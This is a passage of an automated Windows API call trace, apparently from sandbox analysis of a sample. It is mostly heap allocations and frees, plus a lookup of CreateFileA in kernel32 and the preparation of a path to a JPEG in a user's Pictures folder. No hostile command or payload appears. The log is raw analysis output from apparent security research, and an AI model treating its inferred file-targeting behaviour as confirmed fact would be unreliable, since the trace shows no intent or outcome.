HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0040.698] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0040.698] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0040.698] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0040.698] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0040.698] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0040.698] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0040.698] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0040.698] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0040.698] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0040.698] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0040.698] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0040.698] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0040.698] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0040.698] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0040.698] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0040.698] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0040.698] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0040.698] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0040.698] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0040.698] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0040.698] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0040.698] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0040.699] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0040.699] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0040.699] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0040.699] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0040.699] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0040.699] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0040.699] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af568 [0040.699] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0040.699] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889928 [0040.699] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0040.699] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0040.699] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0040.699] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0040.699] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0040.699] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c9b8 [0040.699] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1300 [0040.699] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0040.699] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0040.699] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0040.699] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0040.699] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab2f0 [0040.699] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0040.699] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0040.699] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0040.699] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0040.699] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0040.699] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0040.699] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0040.699] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0040.699] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0040.700] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0040.700] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0040.700] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0040.700] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0040.700] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0040.700] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0040.700] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0040.700] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0040.700] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0040.700] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0040.700] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0040.700] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0040.700] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0040.700] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0040.700] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0040.700] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0040.700] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0040.700] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0040.700] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0040.700] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0040.700] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0040.700] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0040.700] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0040.700] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0040.700] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0040.700] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0040.700] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0040.700] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0040.700] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0040.700] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0040.701] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0040.701] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0040.701] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0040.701] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0040.701] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0040.701] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0040.701] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0040.701] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0040.701] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0040.701] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0040.701] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0040.701] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0040.701] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0040.701] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0040.701] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0040.701] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0040.701] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0040.701] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0040.701] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0040.701] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0040.701] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0040.701] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0040.701] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0040.701] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0040.701] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0040.701] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0040.701] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0040.701] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0040.701] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0040.701] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0040.701] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0040.701] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0040.702] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0040.702] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0040.702] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0040.702] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5bb8 [0040.702] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0040.702] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0040.702] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0040.702] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0040.702] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0040.702] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0040.702] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0040.702] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0040.702] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0040.702] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0040.702] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0040.702] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0040.702] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0040.702] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0040.702] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0040.702] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0040.702] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0040.702] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0040.702] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0040.702] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0040.702] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0040.702] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0040.702] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0040.702] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0040.702] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0040.703] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0040.703] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0040.703] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0040.703] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0040.703] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0040.703] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0040.703] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0040.703] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0040.703] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0040.703] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0040.703] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0040.703] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0040.703] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0040.703] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0040.703] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0040.703] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0040.703] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0040.703] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0040.703] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0040.703] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0040.703] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0040.703] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0040.703] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0040.703] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0040.703] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0040.703] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0040.703] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0040.703] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0040.703] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0040.703] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0040.703] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0040.704] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0040.704] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0040.704] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0040.704] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0040.704] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0040.704] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0040.704] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0040.704] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0040.704] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0040.704] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0040.704] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0040.704] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0040.704] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0040.704] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0040.704] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0040.704] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0040.704] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0040.704] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0040.704] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0040.704] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0040.704] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0040.704] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0040.704] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0040.704] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0040.704] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0040.704] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0040.704] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0040.704] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x889538 [0040.705] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x889538, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0040.705] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0040.705] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFile") returned 0x0 [0040.705] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0040.705] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0040.705] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0040.705] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0040.705] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0040.705] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0040.705] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0040.705] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889538 [0040.705] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x889538, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0040.705] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0040.705] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileA") returned 0x76e253c6 [0040.705] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0040.705] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0040.705] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0040.705] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0040.705] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0040.705] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0040.705] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0040.705] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0040.705] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0040.705] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0040.705] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0040.705] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0040.705] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10001) returned 0xab2010 [0040.706] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\HCAqLJKeYC.jpg", cchWideChar=59, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 59 [0040.706] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x3b) returned 0x7ab260 [0040.706] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\HCAqLJKeYC.jpg", cchWideChar=59, lpMultiByteStr=0x7ab260, cbMultiByte=59, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\HCAqLJKeYC.jpg", lpUsedDefaultChar=0x0) returned 59 [0040.706] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0040.706] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0040.706] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0040.706] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0040.706] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0040.706] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0040.706] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0040.706] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0040.706] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0040.706] 